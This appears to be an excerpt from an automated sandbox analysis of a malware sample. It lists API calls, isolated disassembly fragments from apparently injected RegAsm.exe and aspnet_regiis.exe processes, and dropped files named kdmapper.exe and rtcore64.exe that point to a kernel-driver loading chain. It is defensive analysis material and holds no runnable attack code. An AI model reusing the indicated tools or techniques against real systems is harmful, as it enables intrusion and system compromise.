Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000001F.00000003.1395098552.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395278508.000001EC889C0000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.31.dr

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C482858 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF60C482858
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953A518 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	28_2_00007FF6A953A518
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	52_2_00ECA69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	52_2_00EDC220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EEB348 FindFirstFileExA,	52_2_00EEB348
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D072A2D FindFirstFileExW,	65_2_6D072A2D

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Edge\msedge.exe	File opened: C:\Users\user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	47_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	47_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	47_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	47_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	47_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	47_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	47_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	47_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	47_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	47_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	47_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	47_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	47_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	47_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	47_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	47_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	47_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	47_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	47_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	47_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	47_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	47_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	47_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	47_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	47_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	47_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	47_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	47_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	47_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	47_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	47_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	47_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	47_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	47_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	47_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	47_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	47_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	47_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	47_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	47_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	47_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	47_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	47_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	47_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	47_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	47_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	47_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	47_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	47_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	47_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	47_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	47_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	47_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	47_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	47_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	47_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	47_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	47_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	47_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	47_2_00443FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	73_2_0039B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h	73_2_003C4040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	73_2_003B00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	73_2_003C80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	73_2_0039508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp+50h], 00000000h	73_2_0039508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], dx	73_2_003A10D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003A9140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah	73_2_003AF1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	73_2_003C518B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000688h]	73_2_0039D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	73_2_0039F1D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h]	73_2_0038C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]	73_2_0038C210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	73_2_003A7250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	73_2_003A7250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	73_2_00394294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003AD295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	73_2_003AD295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], ax	73_2_003AA280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp+34h], edx	73_2_003812F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B3335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B3335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	73_2_00396319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edi]	73_2_003AA3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	73_2_003AA3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then dec ebx	73_2_003BF3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], dx	73_2_003A14EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h	73_2_003BF4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh	73_2_003BF4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], dx	73_2_003A14D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003AD4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	73_2_003AD4D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	73_2_003AC510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	73_2_00396574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	73_2_003C7630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	73_2_003B1670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000D0h]	73_2_0039D672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	73_2_003C16A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	73_2_0038A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, eax	73_2_0038A680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp al, 2Eh	73_2_003AC6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003AC6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000D0h]	73_2_0039D733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then xor eax, eax	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	73_2_003C7820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	73_2_00396866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	73_2_003AA8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	73_2_00392920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	73_2_00392920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_00392920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [003D1A70h]	73_2_003AE927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h]	73_2_0038F917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	73_2_003BB9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	73_2_003C9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	73_2_003ADA0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then xor eax, eax	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp dword ptr [003D042Ch]	73_2_0039FB73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	73_2_003C3B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	73_2_00384B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h	73_2_003ADB4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	73_2_0039FBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	73_2_003C9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B3BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B3BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B3BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	73_2_003B3BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	73_2_003C6BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ebx	73_2_003C8BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	73_2_00385C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	73_2_0038FC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	73_2_003C6C5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	73_2_003A0C4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	73_2_003C4C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	73_2_003C9D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	73_2_003C9D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h	73_2_003A7D03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003C3DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp eax, C0000004h	73_2_0039DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]	73_2_00386E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [edx+ebp]	73_2_00386E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	73_2_00395E11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_003AEE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ebx	73_2_003C8F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	73_2_003A6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	73_2_0038DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	73_2_0038DFC0

Networking

Suricata IDS alerts for network traffic
